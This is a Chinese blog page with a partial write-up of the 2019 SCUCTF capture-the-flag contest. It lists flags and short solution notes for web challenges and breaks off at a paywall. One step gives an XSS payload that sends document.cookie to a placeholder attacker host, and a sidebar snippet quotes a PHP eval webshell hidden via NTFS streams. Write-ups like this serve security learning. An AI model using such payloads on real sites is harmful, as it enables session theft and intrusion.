2019SCUCTF部分题解

最新推荐文章于 2025-06-16 21:18:05 发布
最新推荐文章于 2025-06-16 21:18:05 发布
阅读量1.3k 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/perfect0066/article/details/90381016
本文介绍了2019SCUCTF网络安全竞赛的部分解题思路,涉及Web、RE、Pwn等多个领域。解题者通过Burp Suite、URL decode和Base64解密等技术攻破Web题目,利用DLL劫持和栈溢出解决逆向工程问题,并通过流量分析和内存镜像获取隐藏信息。此外,还涉及了隐写术、莫尔斯电码解密等加密挑战。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

writeup

2019SCUCTF部分题解

比赛地址:https://2019ctf.scuctf.com
时间有限,writeup写的简单了点,有时间再补充

赛前通知

解题思路

在这里插入图片描述

flag

scuctf{signup}

web

来了老弟

解题思路

直接burpsuite抓包

在这里插入图片描述
对flag进行urldecode,在进行base64解密得flag

flag

SCUCTF{y0U_jUs7_neEd_car3ful}

你好呀

解题思路

在这里插入图片描述
在这里插入图片描述

反序列化漏洞,见参考链接

获得一个反弹shell
在这里插入图片描述

参考链接:

Node.js 反序列化漏洞远程执行代码(CVE-2017-5941) - 20145312袁心 - 博客园
https://www.cnblogs.com/yx20145312/p/7020206.html

利用 Node.js 反序列化漏洞远程执行代码
https://paper.seebug.org/213/

flag

scuctf{2602547F25B5C13D62F010230D917481}

简单的XSS

解题思路

先访问 http://120.78.185.175:5000/hachp1/love/index.php?greet=<iframe src="../">
在这里插入图片描述

再访问

http://120.78.185.175:5000/hachp1/love/index.php?greet=<script>document.location.href="https://yourIP?c="%2bdocument.cookie;</script>

具体什么原理我也不清楚,在网上找到相似的题就把payload抄过来了。

参考链接

我的CSP绕过思路及总结 - 先知社区
https://xz.aliyun.com/t/5084

Bypassing path restriction on whitelisted CDNs to circumvent CSP protections - SECT CTF Web 400 writeup | Blog - 0daylabs
https://blog.0daylabs.com/2016/09/09/bypassing-csp/

有趣的cdn bypass CSP · LoRexxar’s Blog
https://lorexxar.cn/2017/02/16/cdn-bypass-csp/

TCTF/0CTF2018 XSS Writeup
https://paper.seebug.org/574/#h4x0rsspace

flag

scuctf{l0v3_15_s0_w4rm}

稍难一点的XSS

解题思路

最低0.47元/天 解锁文章

200万优质内容无限畅学
算法分析一道逆向CTF题
m0_64973256的博客
04-21 407
1.下载查壳,跑一遍 提示输入,随便输入后结束程序 2.使用IDA静态分析,拖进去直接F5伪代码分析 v7 = strcmp(byte_40336C, aXircjR2twsv3pt); if ( v7 ) v7 = v7 < 0 ? -1 : 1; if ( !v7 ) { sub_401020("right\n", Arglist[0]); system("pause"); } 从伪代码...
图片隐写术
热门推荐
Binwalker的博客
08-30 4万+
在CTF题目中图片隐写题属于杂项的一部分,题目较为简单。本文大致梳理了下CTF比赛套路。
SCUCTF RE
皮三宝好菜的博客
12-27 454
SCUCTF RE5 这题一开始没写出来。。。后来看了网上大神的wp后了解了 学到了很多,比如rc4加密啊 当然这题目设计的加密都是魔改的 先看大概流程,前面俩函数主要是吧输入的name和info转移 通过动态调试可以试出来 然后是魔改的rc4加密,根据rc4对称性,只要知道异或的几个数就行了,所以用od调试可以获得。 然后是改了码表的base64加密。 所以逆运算的话就是吧txt里的先来一次...
CTF之与佛论禅
qq_46263951的博客
04-19 1万+
首先我们拿到一段文字如下: 沙呐能瑟諳提諸缽藝夜不度大羯多奢都離上奢世怯老俱藐那諳特藝涅南諳礙冥離諳咒陀哆至怯訶梵豆以室豆諳阿侄殿楞勝哆地度寫佛哆特等皤隸俱殿諳盧缽曰老梵實冥明梵離侄帝梵蘇穆咒故彌梵栗缽咒地缽上怯勝俱除皤多訶奢僧諳所夜夢佛缽悉皤栗上梵遠闍訶吉奢沙諳所怯能 啊。。。 如果有了解过与佛论禅这个网站的话就很容易清楚这一段佛语是可以解密的,下面我们使用与佛论禅网站来进行解密,使用的网站为http://www.keyfc.net/bbs/tools/tudoucode.aspx 这里我们可以
BUUCTF------LSB
最新发布
meiqianchifanle的博客
06-16 518
题目很简单,主要是讲述LSB隐写以及工具使用。
[WUSTCTF2020]佛说:只能四天
qu_xian的博客
06-23 962
用到了多个经典的加密方式,俄罗斯套娃
关于NTFS数据流ADS的详细介绍
AmrYu的博客
02-02 5579
ADS数据流能否脱离文件单独存在?将一个文件设置为另一个宿主文件的ADS数据流之后,源文件能否删除?
buuctf--佛说:只能四天
2301_81060697的博客
02-20 643
密码学
Writeup-北邮新生赛MRCTF-Web题:ez_bypass
Y5neKO's blog
10-16 647
原题地址:https://merak-ctf.site/challenges#ez_bypass 首先从题目可以看出:easy_bypass,简单的绕过 我们打开题目地址,简单的展示了源码的一部分 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET[
CTF/CTF练习平台-XSS【xss注入及js unicode编码及innerHTML】
Sp4rkW的博客
08-31 1万+
原题内容: http://103.238.227.13:10089/ Flag格式:Flag:xxxxxxxxxxxxxxxxxxxxxxxx 题目有点坑啊,注入点都没说明,去群里问的,这题注入点为id(get方式),id的值会进行替换后进入s 补充了这个,好了,继续做题 右键源码 &lt;script&gt; var s=""; docu...
CTFpwn总结 入门
九层台
04-26 2万+
学了那么久pwn了,基础知识终于积累的差不多了,来这个总结希望其他学pwn的人能少走一些弯路。 0x01学pwn需要哪些知识呢? 堆栈是少不了的。要知道函数调用的时候,栈中的数据是怎么放的,知道ebp在哪,知道返回地址在哪。 能看懂汇编,2条指令要清楚,ret和call。 具备这些基础知识你就能够开始学pwn了。 0x02需要注意什么 在溢出是要清楚2个...
2019年CTF3月比赛记录(一):BSidesSF 2019 CTF_Web部分题目writeup与重解
極品━═☆宏的博客
03-07 4200
2019年CTF比赛记录(一) 为了更好地学习CTF方面的相关知识,本着以赛促学的目的,决定自己报名参加一些2019年的CTF比赛,在比赛中去学其他的知识,帮助自己更好的学习Web方面的知识。限于个人能力有限,而且在时间上的限制,比赛中仅对自己当时看到的题目和解出的题目进行了解答。 比赛:BSidesSF 2019 CTF 时间:2019年3月4日至2019年3月5日 ...
Bytectf-几道web总结
weixin_30376453的博客
09-21 885
1.EZcms 这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化 首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess 这里主要记录一点,利用php内置类进行文件操作, exp为: <?php class File{ public $filename...
【web端权限维持】利用ADS隐藏webshell
09-29 514
0X01 前言   未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。 0X02 利用ADS隐藏webshell   关于ADS的介绍,就不再阐述,详见尾部参考资料。   PHP 一句话木马:&lt;?php @eval($_POST['chopper']);?&gt;,当然也可...
SUSCTF 2019
皮三宝好菜的博客
04-14 1120
SUSCTF 2019 http://www.psbazx.com/2019/04/14/susctf-2019/ 懒得搬过来了。。。
SUCTF_2019部分题解复现
weixin_44255856的博客
08-19 1545
本次比赛还是太菜了,只写出了两道题。但是学习到了很多东西。 web check 题目是一个文件上传,但是限制了很多地方,限制了文件类型,并且判断了文件上传的文件内容,这里是使用exif_image判断的。可以通过手动添加GIF89,也可以在文件头加上width和height 这里在前面添加 #define width 1337 #define height 1337 auto_prepend...
SCUCTF
皮三宝好菜的博客
12-25 739
SCUCTF RE re1 拖进ida里一看就出来了 但是提交的时候答案是SCUCTF{}。。。。。。 没搞懂为啥,害得我调试了半天 re2 程序加壳了直接脱了后看伪代码 //第一次写的时候没脱壳。。。因为加密算法比较简答,就是和0x27逐个异或么。。。 上py a = [0x74, 0x5E, 0x5C, 0x75, 0x42, 0x51, 0x14, 0x55, 0x54, 0x42, ...
2019 jxcpc 部分题解和代码
JZK-Keven 的博客
07-21 318
Problem A. Cotree 题意:给你两棵树(两棵树的结点数为 ),让你给两棵树连一条边变成一棵树,求的最小值。 1、树中所有点到某个点的距离和中,到重心的距离和是最小的。 2、考虑给两颗树的重心连一条线,这样会使答案最小。 3、如何求树的重心?https://blog.youkuaiyun.com/qq_41608020/article/details/95201070 4、对整棵树从上...
ctf题库--1000
miko2018的博客
08-21 2万+
&lt;题目&gt; 答案格式:CTF{} 解题链接: http://ctf5.shiyanbar.com/misc/1000.exe &lt;解答&gt; 打开题目链接下载文件,打开exe,在输入密码之前程序创建了tips.jpg的图片文件。 ※程序提示1000有特殊含义,因此我们考虑是二进制,我们将其转换成十进制的8并且输入。 得到了和tips一样的结果。可是点击确定后却没有...
ICPC太平洋西北区域赛2019题解分析
"这份PDF文件包含了ICPC Pacific Northwest Regional Contest 2019的比赛题解,涵盖了Div1和Div2的题目。文件主要讨论了五个不同的算法问题,分别是A.RadioPrize、B.PerfectFlush、C&PColoringContention、D&Q....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值